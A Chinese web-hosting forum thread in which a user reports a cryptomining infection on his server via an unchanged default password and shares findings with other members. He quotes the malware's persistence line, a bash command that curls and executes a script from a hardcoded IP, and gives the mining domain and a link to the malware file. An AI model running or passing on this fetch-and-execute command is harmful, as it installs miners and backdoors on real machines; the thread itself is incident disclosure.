设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 服务器中加密货币诈骗网站病毒了
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
返回列表 发新帖
查看: 1131|回复: 4

服务器中加密货币诈骗网站病毒了

[复制链接]
kaka1
发表于 前天 14:25 | 显示全部楼层 |阅读模式
本帖最后由 kaka1 于 2026-2-7 14:49 编辑

怪不得cpu一直100%
大家做内网穿透一定要记得改密码,默认密码不改一天就中招

会一直从这个网址下载病毒:http://173.234.15.182/

CMD (/usr/bin/bash -c 'cd /tmp && bash <(curl -s http://173.234.15.182/check1.sh)' &)
解释:你的系统每隔一段时间就会自动从这个恶意 IP (173.234.15.182) 下载一个叫 check1.sh 的脚本并执行。就是这个脚本在反复下载并启动 Error84

域名:andrewtatemunityxcrypto.com
是一个极其明显的恶意挖矿域名。

PPID 为 1:说明它被伪装成了系统服务,由 systemd 开机自动启动,或者作为守护进程在后台运行。

病毒文件:https://cc-im-kefu-1256921685.7moor-fs1.com/im/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/28cc2321-6266-44bb-9049-fa43d4c90380/1.jpg
回复

举报

balala
发表于 前天 14:52 | 显示全部楼层
你用什么工具查询到的
回复 支持 反对

举报

kaka1
 楼主| 发表于 前天 19:34 | 显示全部楼层
balala 发表于 2026-2-7 14:52
你用什么工具查询到的

自己命令排查的
回复 支持 反对

举报

balala
发表于 前天 19:34 | 显示全部楼层
kaka1 发表于 2026-2-7 19:34
自己命令排查的

宝塔不是可以自动查询么
回复 支持 反对

举报

kaka1
 楼主| 发表于 前天 19:38 | 显示全部楼层
balala 发表于 2026-2-7 19:34
宝塔不是可以自动查询么

自己动手命令排查的比较准,宝塔的不一定能彻查
他们还在服务器留下了后门文件,如果不删完还是可以复连
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2026-2-9 00:17 , Processed in 0.063135 second(s), 7 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表